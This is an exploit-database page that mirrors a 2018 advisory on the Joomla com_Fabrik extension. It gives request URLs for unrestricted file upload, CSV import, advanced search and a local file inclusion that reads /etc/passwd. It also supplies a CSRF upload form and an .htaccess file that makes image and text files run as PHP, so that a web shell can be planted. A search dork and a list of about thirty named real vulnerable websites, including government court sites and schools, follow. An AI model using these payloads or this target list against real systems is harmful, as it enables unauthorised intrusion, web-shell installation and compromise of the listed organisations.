Advertisement






Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF

CVE Category Price Severity
Not specified CWE-264 Unknown High
Author Risk Exploitation Type Date
Not specified High Remote 2018-11-29
CPE
cpe:cpe:/a:joomla:fabrik
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018110238

Below is a copy:

Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability
#################################################################################################

# Exploit Title : Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 29/11/2018
# Vendor Homepage : extensions.joomla.org/extension/fabrik/ ~ fabrikar.com
# Tested On : Windows and Linux
# Software Download Links : fabrikar.com/downloads
# Category : WebApps
# Version Information : All Current Versions.
# Google Dorks : inurl:''/index.php?option=com_fabrik''
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
+ CWE-434 - [ Unrestricted Upload of File with Dangerous Type PHP ]

#################################################################################################

# Exploit Title : Joomla Com_Fabrik pluginAjax importcsv _advancedsearch getprodimg controller LFI with htaccess CSRF Shell Access Vulnerability

# Admin Panel Login Path : 

/administrator/

#################################################################################################

# Exploit 1 : 

/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

# Error : 

{"filepath":null,"uri":null}

{"error":"Error. Unable to upload file."}

#################################################################################################

# Exploit 2 : 

/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0

Directory File Path : /media/...

#################################################################################################

# Exploit 3 : 

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11

/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=
12&nextview=list&scope=com_fabrik&tkn=[RANDOM-HASH-NUMBERS]

Add and Delete Vulnerability

Note : If websites says while exploiting the code like this '' Sorry this form is not published ''. It is not vulnerable. Bugs Fixed. 

#################################################################################################

# Exploit 4 : 

/component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=plugin&c=plugin&task=userAjax&method=getprodimg

# Example Error :

{"id":8,"model":"table","errors":[],"data":{"___betrieb":[""],"___modell":"","___betreff":"Probefahrt","___firma":"","
___anrede":["0"],"___name":"","___email":"",
"___strasse":"","___plz":"","___ort":"","___telefon":"","___bemerkungen":"","___empfaenger":"","___captcha":"","
___datenschutz":[""]},"html":{"___betrieb":"\r\n","___modell":"","___betreff":"<!-- Probefahrt -->","___firma":"",
"___anrede":"bitte whlen","___name":"","___email":"","___strasse":"","___plz":"","___ort":"","___telefon":"",
"___bemerkungen":"","___empfaenger":"<!-- -->","___captcha":"","___datenschutz":""},"post":
{"option":"com_fabrik","format":"raw","controller":"plugin","c":"plugin","task":"userAjax","method":
"getprodimg\\","Itemid":null,"view":"form","formid":"8","rowid":"index"}}

#################################################################################################

# Exploit 5 : 

/index.php?option=com_fabrik&controller=[Local File Inclusion]

/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00

Note : If says while exploiting the code '' 0  Call to a member function getData() on null ''.  It means that the vulnerability has been fixed.

#################################################################################################

# CSRF Exploiter Code =>  [ Upload Htaccess File via This Script ] - Save this file as [yourfilename].html

<title>KingSkrupellos - Cyberizm Digital Security Team</title>
<br>
<br>
<font size="10">Joomla CSRF Com_Fabrik File Upload Shell Access Exploiter</h1><br><br>
<form method="POST" action="http://www.[TARGETSITE]/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>OKAY</button>
</form>
</center><br></font>

#################################################################################################

# HtAccess File => 

DirectoryIndex cyberizm.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .gif
AddType application/x-httpd-php .jpg
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla
AddType application/x-httpd-php .php
AddType application/x-httpd-php .asp
AddType application/x-httpd-php .js
AddType application/x-httpd-php .shtml
AddType application/x-httpd-php .html
AddType application/x-httpd-php .htm

# or you can use this

DirectoryIndex index.html
AddType application/x-httpd-php .png
AddType application/x-httpd-php .txt
AddType application/x-httpd-php .fla

#################################################################################################

# Exploit 1 => Example Successfull Attack Scenario => 

{"filepath":"\/.htaccess","uri":"http:\/\/pn-kebumen.go.id\/.htaccess"}

# Shell Access Path : TARGETDOMAIN/media/[YOURSHELLNAMEHERE.php]

#################################################################################################

# Example Vulnerable Sites =>

[+] pn-kebumen.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] pn-jeneponto.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] pn-sidikalang.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] pn-parepare.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] pn-balige.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] ticketexchange.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] tiwc.gr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] labelchip.it/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] halaimemon.org/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=component&listid=11

[+] dakotahistory.org/index.php?option=com_fabrik&format=partial&view=list&layout=_advancedsearch&tmpl=
component&listid=12&nextview=list&scope=com_fabrik&tkn=

[+] volkswagen-automobile-berlin.de/component/fabrik/form/8/index.php?option=com_fabrik&format=raw&controller=
plugin&c=plugin&task=userAjax&method=getprodimg

[+] cyo-no.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] tchoukball.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] lluisoshorta.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0

[+] aswc.seagrant.uaf.edu/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] wildwood.edu/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] bnetrust.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] seadfoundation.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] edim.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload&lang=fr

[+] tpacharterschool.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] delamoflyers.org/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] mairie-orsay.fr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] cfh-aih.fr/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] industriesalon.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] ostbayern-kurier.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] wanzenschreck.de/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] traditionalscouting.co.uk/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] kabin.no/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

[+] bcsd.us/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum